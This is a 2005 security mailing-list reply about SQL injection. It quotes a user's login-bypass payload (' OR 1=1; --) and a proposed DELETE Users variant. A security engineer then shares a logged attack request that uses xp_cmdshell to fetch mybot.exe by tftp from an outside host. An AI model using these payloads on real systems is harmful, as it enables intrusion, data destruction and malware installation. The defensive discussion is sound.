WebApp Sec mailing list archives
Re: SQL injection
From: James Riden <j.riden () massey ac nz>
Date: Wed, 19 Jan 2005 20:34:16 +1300
"Francesco" <francesco () blackcoil com> writes:
I have just discovered that I can successfully inject the following SQL: ' OR 1=1; -- into the Username field of a logon form on a "secure" site in my corporate network (Windows 2000, SQL 7.0). When I do this, leaving the password field blank, I am logged into the system as the first user in the "Users" table in the DB which is being authenticated against. LOL. If I can get that far, can't I theoretically: ' OR 1=1; DELETE Users; -- or something similar? Couldn't I EXEC some system sprocs this way too? How much damage/rooting can be done here? I need to present a detailed report to the admins.
Captured here - unsuccessful incidentally - an attack from 24.1.xx.yy GET /foo.asp?bar=baz';%20exec%20master..xp_cmdshell%20'tftp%20-i%2024.1.xx.yy%20get%20mybot.exe%20C:%5Carcld.exe'-- HTTP/1.1 (The '..' between 'master' and 'xp_cmdshell' is 2E 2E hex.) I don't know what mybot.exe was, but it's probably not good :) cheers, Jamie -- James Riden / j.riden () massey ac nz / Systems Security Engineer GPG public key available at: http://www.massey.ac.nz/~jriden/ This post does not necessarily represent the views of my employer.
Current thread:
- SQL injection Francesco (Jan 19)
- Re: SQL injection James Riden (Jan 23)
- Re: SQL injection Josh Zlatin-Amishav (Jan 23)
- RE: SQL injection John McGuire (Jan 23)
- Re: SQL injection exon (Jan 23)
- Re: SQL injection Serg Belokamen (Jan 23)
- Re: SQL injection Cory Foy (Jan 23)
- Re: SQL injection nummish (Jan 23)